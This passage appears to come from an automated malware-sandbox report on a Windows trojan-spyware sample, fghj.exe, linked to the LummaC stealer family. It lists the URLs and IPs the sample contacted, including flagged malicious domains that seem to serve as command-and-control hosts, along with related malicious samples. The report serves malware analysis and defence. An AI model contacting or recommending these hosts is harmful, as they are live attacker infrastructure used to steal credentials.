                                                                                                                                                                                  https://store.steampowered.com/news/fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&ampfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://sputnik-1985.com/04fghj.exe, 00000000.00000003.1512826189.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://store.steampowered.com/subscriber_agreement/fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://recaptcha.net/recaptcha/;fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://sputnik-1985.com/I3fghj.exe, 00000000.00000003.1512826189.0000000000D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&amp;l=enfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://steamcommunity.com/discussions/fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://debonairnukk.xyz/apifghj.exe, 00000000.00000002.1613807764.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0fghj.exefalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://store.steampowered.com/stats/fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.cohKfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://medal.tvfghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://broadcast.st.dl.eccdnx.comfghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  104.21.96.1
                                                                                                                                                                                                                  		sputnik-1985.comUnited States
                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  104.102.49.254
                                                                                                                                                                                                                  		steamcommunity.comUnited States
                                                                                                                                                                                                                  		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                  Analysis ID:1587452
                                                                                                                                                                                                                  Start date and time:2025-01-10 11:46:38 +01:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:0h 4m 22s
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                  Number of analysed new started processes analysed:5
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Sample name:fghj.exe
                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  • Number of executed functions: 19
                                                                                                                                                                                                                  • Number of non-executed functions: 143
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                  • Stop behavior analysis, all processes terminated

                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.253.45, 52.149.20.212
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                  05:47:46API Interceptor11x Sleep call for process: fghj.exe modified

                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  104.21.96.1QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.mzkd6gp5.top/3u0p/
                                                                                                                                                                                                                  SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                  • pelisplus.so/administrator/index.php
                                                                                                                                                                                                                  Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • www.mffnow.info/1a34/
                                                                                                                                                                                                                  104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                  • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                  http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • www.valvesoftware.com/legal.htm

                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  sputnik-1985.comCondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.21.48.1
                                                                                                                                                                                                                  filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.21.48.1
                                                                                                                                                                                                                  expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.21.64.1
                                                                                                                                                                                                                  anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.21.48.1
                                                                                                                                                                                                                  appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.21.80.1
                                                                                                                                                                                                                  [UPD]Intel_Unit.2.1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.21.64.1
                                                                                                                                                                                                                  Installer.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.21.80.1
                                                                                                                                                                                                                  BnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                                                                                                                                                                  • 104.21.48.1
                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                  steamcommunity.comCondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  ModelsPreservation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  SensorExpo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  s-part-0017.t-0009.fb-t-msedge.nethttps://p3rsa.appdocumentcenter.com/BpdLOGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                                                                  dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                                                                  Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                                                                  Notification of a Compromised Email Account.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                                                                  https://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                                                                  https://meliopayments.cloudfilesbureau.com/j319CGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                                                                  Setup64v9.9.8.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                                                                  https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                                                                  Play_VM-NowAccountingAudiowav011.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 13.107.253.45
                                                                                                                                                                                                                  17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • 13.107.253.45

                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  CLOUDFLARENETUSCondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.21.48.1
                                                                                                                                                                                                                  filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.21.48.1
                                                                                                                                                                                                                  expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.21.64.1
                                                                                                                                                                                                                  anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.21.48.1
                                                                                                                                                                                                                  https://we.tl/t-fnebgmrnYQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.26.0.90
                                                                                                                                                                                                                  appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.21.80.1
                                                                                                                                                                                                                  Undelivered Messages.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.21.84.200
                                                                                                                                                                                                                  driver.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                  • 162.159.137.232
                                                                                                                                                                                                                  XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                  • 104.20.4.235
                                                                                                                                                                                                                  http://www.efnhdh.blogspot.mk/Get hashmaliciousGRQ ScamBrowse
                                                                                                                                                                                                                  • 172.67.12.83
                                                                                                                                                                                                                  AKAMAI-ASUSCondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  ModelsPreservation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  filename.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  SensorExpo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.102.49.254

                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1CondosGold_nopump.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                  PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                  ModelsPreservation.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 104.21.96.1
                                                                                                                                                                                                                  filename.exeGet hashmaliciousLummaCBrowse
